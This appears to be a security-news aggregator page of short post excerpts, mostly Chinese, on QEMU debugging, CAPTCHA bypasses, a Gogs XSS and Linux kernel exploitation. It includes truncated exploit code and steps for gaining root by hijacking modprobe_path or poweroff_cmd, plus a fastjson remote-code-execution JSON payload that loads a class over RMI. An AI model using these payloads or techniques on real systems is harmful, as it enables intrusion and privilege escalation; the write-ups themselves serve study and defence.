Aggregator
跟踪qemu-kvm下的磁盘写入
5 years 3 months ago
傻了,上一个调试的时候没加-enable-kvm,而且电脑的虚拟化也是关着的。假装无事发生过,一切调整就绪后,重新在KVM模式下调试。终于在另一台linux老爷机上装好了qemu和各种软件,继续从这里...
leonwxqian
Women in Security: Security Technical Project Manager
5 years 3 months ago
We continue to see large-scale online security attacks affecting corporations and public institutions. These attacks are becoming more and more sophisticated, making it harder to protect yourself. The constant evolution of attacks requires innovative solutions that only Akamai can provide....
Akamai
调试qemu 硬盘io的过程
5 years 3 months ago
好久没有水文章了……在家无聊,正好最近也是在研究虚拟化相关的东西,就调一调qemu中文件写入的流程吧。这里说的写入是指,qemu启动的虚拟机,虚拟机中如果发生文件IO,那么qemu如何知道要更新对应的...
leonwxqian
产品视角从“分析”到“响应”
5 years 3 months ago
从“检测”到“响应”,必然绕不开“分析”这个关键阶段。然而,无论是Gartner还是其他第三方分析报告,对“分析”这个环节都没有给出太多的解释,但无论如何“分析”所承载的正是从“检测”到“响应”的核心业务逻辑。
PHP 多进程下载必应壁纸
5 years 3 months ago
手里拿着锤子,看什么都像是钉子 在放假的这几天,断断续续的看了老李关于 PHP 多进程的文章。 PHP多进程初探 — 开篇 PHP多进程初探 — 孤儿和僵尸 PHP多进程初探
linux 内核提权总结(demo+exp分析) -- 任意读写(三)
5 years 3 months ago
发表于看雪论坛
hijack_modprobe_path篇 原理同hijack_prctl, 当用户执行错误格式的elf文件时内核调用call_usermodehelper(char *modprobe_path …)
修改modprobe后,即可实现root权限任意命令执行
攻击流程
(内核任意读写漏洞)内核修改全局变量 modprobe_path为目标指令 写入错误格式elf文件,并手动执行,触发 一. 利用步骤 1. 定位modprobe_path(开启kaslr) 同hijack_vdso,泄漏vdso地址,因为内核kaslr开启后,只有较高字节的地址发生偏移,且vdso与基地址相距较近,所以可以使用vdso定位内核加载地址
获得当前调试阶段modprobe_path与内核基地址固定偏移
modprobe_path_addr = 内核基地址+固定偏移
2. 修改modprobe_path 为任意指令 二. 驱动代码(见cred) 三. exp #define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> #include <sys/ioctl.h> #include <sys/auxv.h> #include <sys/prctl.h> #define CHANGE_POINT 0x100000 #define RW_READ 0x100001 #define RW_WRITE 0x100002 size_t modprobe_path = 0xe3cba0; size_t vmlinux_base = 0; struct vunl { char *point; size_t size; } VUNL; void leak_data(int fd, char *buf) { char *res = NULL; VUNL.
fastjson RCE 分析
5 years 3 months ago
简介
先看经典 payload
1{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}我的2018/2019
5 years 3 months ago
前言一转眼博客两年没更新了,原因有很多,主要还是因为懒…另外因为不怎么搞研究了,所以感觉没啥好写的,有些内部做的东西又不太好公开发。安全开发17年底刚进入新公司时,本以为会继续做安全攻防方向,不...
0x0d
Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in December 2019
5 years 3 months ago
Threat campaign activity in December 2019 doubled from the previous month.
linux 内核提权总结(demo+exp分析) -- 任意读写(二)
5 years 3 months ago
发表于看雪论坛
hijack_prctl篇 prctl函数: 用户态函数,可用于定制进程参数,非常适合和内核进行交互
用户态执行prctl函数后触发prctl系统调用 内核接收参数后执行security_task_prctl security_task_prctl执行hook.task_prctl poweroff_work_func函数: 内核函数,执行 run_cmd(poweroff_cmd),即root权限执行poweroff_cmd
攻击流程:
劫持hook.task_prctl为目标函数地址(poweroff_work_func) 修改poweroff_cmd为目标指令 用户执行prctl函数,触发 一. 利用步骤 1. 定位内核加载基地址(开启kaslr) 同hijack_vdso,泄漏vdso地址,因为内核kaslr开启后,只有较高字节的地址发生偏移,且vdso与基地址相距较近,所以可以使用vdso定位内核加载地址 2. 定位hook.prctl,poweroff_cmd地址 gdb调试内核并在security_task_prctl函数处下断点,用户态程序执行prctl函数,进入security_task_prctl函数,单步执行汇编指令,通过内存查看hook.task_prctl 地址
gdb 执行 p poweroff_cmd,获得poweroff_cmd真实地址
获得hook.prctl,poweroff_cmd与内核基地址固定偏移
3. 修改poweroff_cmd 为任意指令 4. 用户态执行prctl函数,触发 二. 驱动代码(见cred篇) 三. exp #define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> #include <sys/ioctl.h> #include <sys/auxv.h> #include <sys/prctl.h> #define CHANGE_POINT 0x100000 #define RW_READ 0x100001 #define RW_WRITE 0x100002 #define SET_MEM 0X100003 size_t poweroff_cmd = 0; size_t prctl_hook = 0; size_t poweroff_work_func = 0; size_t vmlinux_base = 0; struct vunl { char *point; size_t size; } VUNL; void leak_data(int fd, char *buf) { char *res = NULL; VUNL.
Security Lessons From 2019’s Biggest Data Breaches
5 years 3 months ago
2019 already feels like it’s worlds away, but the data breaches many consumers faced last year are likely to have...
The post Security Lessons From 2019’s Biggest Data Breaches appeared first on McAfee Blog.
McAfee
实战笔记之X厂滑动验证码漏洞挖掘
5 years 3 months ago
在传统安全界,验证码是很少有白帽子会去关注的一个点,但作为任何一个平台,特别是电商平台,由于黑产作恶手法日益猖獗,业务安全带来的损失,很可能会超过一个OWASP top 漏洞带来的危害。
滑动验证码攻防对抗
5 years 3 months ago
隐秘接口处XSS带来的惊喜,绕过验证思路。实战总结的灰黑产精准识别方案。
实战笔记之X厂滑动验证码漏洞挖掘
5 years 3 months ago
在传统安全界,验证码是很少有白帽子会去关注的一个点,但作为任何一个平台,特别是电商平台,由于黑产作恶手法日益猖獗,业务安全带来的损失,很可能会超过一个OWASP top 漏洞带来的危害。
滑动验证码攻防对抗
5 years 3 months ago
隐秘接口处XSS带来的惊喜,绕过验证思路。实战总结的灰黑产精准识别方案。
实战笔记之X厂滑动验证码漏洞挖掘
5 years 3 months ago
在传统安全界,验证码是很少有白帽子会去关注的一个点,但作为任何一个平台,特别是电商平台,由于黑产作恶手法日益猖獗,业务安全带来的损失,很可能会超过一个OWASP top 漏洞带来的危害。
滑动验证码攻防对抗
5 years 3 months ago
隐秘接口处XSS带来的惊喜,绕过验证思路。实战总结的灰黑产精准识别方案。
Gogs post 反射型 Xss
5 years 3 months ago
通过form利用gogs的post型反射型xss 审计 在审计gogs代码时发现gogs的api允许渲染markdown.最初以为是无法利用的,
思路技巧之生活分享
5 years 3 months ago
这篇文章很轻松,希望能给你呆在屋子里的生活,添一点灵感或者兴趣。